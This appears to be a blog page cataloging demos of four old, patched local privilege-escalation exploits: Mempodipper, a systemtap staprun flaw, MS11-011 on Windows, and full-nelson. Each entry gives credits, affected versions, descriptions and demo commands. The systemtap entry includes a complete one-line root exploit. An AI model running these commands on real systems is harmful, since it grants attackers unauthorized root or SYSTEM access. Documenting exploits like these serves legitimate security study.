Posts tagged Kernel
CVE-2012-0056 Mempodipper Linux Local Root Exploit Demo
Timeline :
Vulnerability discovered by zx2c4 (Jason A. Donenfeld)
Public release of the vulnerability on 2012-01-18
Exploit provided on 2012-01-23
PoC provided by :
zx2c4 (Jason A. Donenfeld)
Reference(s) :
Affected version(s) :
Linux kernels 2.6.39 and above (32-bit or 64-bit).
Tested on Ubuntu 11.10 with :
Linux ubuntu 3.0.0-15-generic
Description :
Mempodipper is an exploit for CVE-2012-0056, an issue in the handling of the /proc/pid/mem write functionality, where permissions are not properly checked in Linux kernel versions 2.6.39 to current. A local, unprivileged user could use this flaw to escalate their privileges.
Commands :
whoami
gcc -o CVE-2012-0056-Mempodipper CVE-2012-0056-Mempodipper.c
./CVE-2012-0056-Mempodipper
whoami
CVE-2010-4170 : systemtap Local Root Privilege Escalation Vulnerability
Timeline :
Vulnerability reported to vendors by Tavis Ormandy on 2010-11-15
Vulnerability corrected by vendors around 2010-11-17
PoC provided by :
Tavis Ormandy
Reference(s) :
Affected version(s) :
Red Hat, Fedora, Debian, Ubuntu, etc.
Tested on Debian squeeze/sid with :
systemtap-runtime_1.0-2_i386.deb
Description :
It was discovered that staprun did not properly sanitize the environment before executing the modprobe command to load an additional kernel module. A local, unprivileged user could use this flaw to escalate their privileges.
Commands :
Requires "systemtap-runtime" on Debian
id
printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever
id
MS11-011 : Windows UAC Bypass 0day
Timeline :
Vulnerability released by noobpwnftw on 2010-11-24
PoC provided by :
noobpwnftw
Reference(s) :
CVE-2010-4398
EDB-ID-15609
MS11-011
Affected version(s) :
Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64
Tested on Windows 7 Integral
Description :
Microsoft Windows does not adequately validate registry data read using the function RtlQueryRegistryValues(). By modifying an EUDC registry key value, a local user could execute arbitrary code with SYSTEM privileges.
Commands :
whoami
poc.exe
whoami
full-nelson.c Linux Kernel local privilege escalation
Timeline :
CVE-2010-3849 reported by Nelson Elhage on 2010-10-18
CVE-2010-3850 reported by Nelson Elhage on 2010-10-18
CVE-2010-4258 reported by Nelson Elhage on 2010-12-02
PoC provided by :
Dan Rosenberg
Nelson Elhage
Reference(s) :
CVE-2010-3849
CVE-2010-3850
CVE-2010-4258
Affected version(s) :
All Linux kernel versions prior to 2.6.37
Tested on Ubuntu 10.10 server
Description :
This exploit leverages three vulnerabilities to get root, all of which were discovered by Nelson Elhage.
Commands :
uname -a
uid
gcc full-nelson.c -o full-nelson
./full-nelson
uid